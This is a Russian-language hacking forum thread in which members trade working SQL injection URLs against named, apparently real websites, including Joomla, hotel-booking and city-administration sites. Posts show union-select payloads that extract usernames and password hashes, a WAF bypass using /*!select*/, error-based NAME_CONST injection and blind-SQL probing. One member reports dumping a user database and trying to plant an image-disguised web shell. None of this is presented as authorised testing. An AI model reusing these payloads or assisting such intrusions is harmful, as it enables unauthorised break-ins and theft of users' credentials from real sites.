Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    а я читал про, про .htaccess, но чёт там не ввидел как сделать чтобы сделать то о чём вы говорите, если подскажите что в нём нужно прописать и дадите ссыль но ПОЛНЫЙ мунал по .htaccess буду очень презнателен
     
  2. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    На неделе, как будет время оформлю пост на эту тему. Сейчас ,к сожалению, проблема с временем.
     
  3. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    Не могу раскрутить.... Мнения типа "читай мануал" и т.д. оставьте при себе и пройдите мимо!
    Code:
    http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,host,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from+(0x6D7973716C2E75736572)+limit+0,1--
    
    http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,id,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from+mamb_users+limit+0,1--
    
    
    http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)--
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+tli_users)--+

    читай мануал
     
    _________________________
    1 person likes this.
  5. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    cipa21,
    я не хочу говорить "читай мануал", но "читай мануал".
    Смотри:
    from+(0x6D7973716C2E75736572)
    Такое только в кошмарах приснится, нельзя тут хекс юзать.
    И вообще там WAF стоит, обходится так:
    Code:
    http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+/*!select*/+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+f
    Версия 5.1.56
     
    4 people like this.
  6. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    И снова я... Здрасьти...
    Code:
    http://www.chnlawyer.org/index.php?option=com_ask&task=ask&act=view&ID=21&menuid=1+union+select+@@version
    information_schema не доступен. Брут таблиц результата не дал. Есть предложения?
     
  7. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    У вас 4ая версия Mysql. В ней еще не было Information_schema! Здесь только вариант брута!
     
    1 person likes this.
  8. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    http://hotel-booking-russia.com/catalog-hotel.shtml?id=11%20and%201=2%20union%20select%201,2,3,4,COLUMN_NAME,6,7,COLUMN_NAME%20from%20INFORMATION_SCHEMA.COLUMNS%20Where%20table_name=%27test_customers%27%20limit%202,1 не могу найти админа.
     
  9. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to ReV0LVeR
    Code:
    http://hotel-booking-russia[dot]com/catalog-hotel.shtml?id=-11+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,uid,login,password,level)+from+test_user+limit+0,1#
    Ищите здесь админа, там несколько уровней у пользователей, я не смотрел кто там именно админ!
     
  10. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    hash вида mysql < 5 "30ef13034a79f1f5" или я не прав?
     
  11. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Там будет типа PREFIX_users. Joomla.

    Ты прав. MYSQL < 5
     
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    http://www.admcity.nnov.ru/script/phones1.php?id=6783+and+1=2
    исчезает содержимое страници

    так перебираю, нифига
    http://www.admcity.nnov.ru/script/phones1.php?id=6783+and+substring%28@@version,1,1%29=5

    может всё же ето не blind sql???
     
  13. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    у Вас там FireBird 2.1.3
    Крутить как вы верно заметили через Blind SQL
     
    2 people like this.
  14. bodrich

    bodrich Member

    Joined:
    9 Jan 2012
    Messages:
    21
    Likes Received:
    7
    Reputations:
    0
    Наткнулся на скулю, раскрутил, слил базу юзеров. Хочу залить шелл. Админки, как таковой нету, но есть модераторы с расширенными возможностями (в частности редактирования статей). FILE_PRYV = off :( Можно загрузить фотку на сервер. Я загрузил фото-шелл(сделал я его по такой схеме:
    ) На сервер фото залилось удачно, но php инклуда я так и не нашел :(. Можно ли еще каким-либо способом залить шелл ?
     
  15. \/ITA

    \/ITA Member

    Joined:
    21 Sep 2011
    Messages:
    25
    Likes Received:
    28
    Reputations:
    8
    Есть инжект ErrorBased:
    Code:
    1'or(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1
    получаю как и положено:
    Code:
    Duplicate column name '5.0.77-log'
    версия 5.0.77

    делаю:
    Code:
    1'or(select*from(select(name_const(database(),1)),name_const(database(),1))a)and(1)='1
    и получаю ошибку в операторе NAME_CONST
    Code:
    Incorrect arguments to NAME_CONST
    что в корне нелогично так как предыдущая команда выполнилась :confused:

    пробую еще:
    Code:
    1'or(select*from(select(name_const((select(SUBSTRING(group_concat(table_name),1,64))from(information_schema.tables)),1)),name_const((select(SUBSTRING(group_concat(table_name),1,64))from(information_schema.tables)),1))a)and(1)='1
    и та же херь:
    Code:
    Incorrect arguments to NAME_CONST
    что еще можно сделать?
     
  16. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    \/ITA,
    через rand выводи.

    UPD:
    https://rdot.org/forum/showthread.php?t=60
     
  17. \/ITA

    \/ITA Member

    Joined:
    21 Sep 2011
    Messages:
    25
    Likes Received:
    28
    Reputations:
    8
    пытаюсь, безпробельный вариант через ранд ваще нереал, нужно чтобы были одни скобки :(

    UPD:
    спс, нашел способ в том топике :D
     
    #20397 \/ITA, 15 May 2012
    Last edited: 15 May 2012
  18. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to \/ITA
    Увы, но в name_const() выводится только version()...
     
  19. foma2120

    foma2120 New Member

    Joined:
    5 Feb 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста, что делать если введенную xss показывает просто как текст?
     
  20. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to foma2120
    Больше данных, что за xss. Где, как, что показывает... Из Ваших слов ничего не понятно!
     
Thread Status:
Not open for further replies.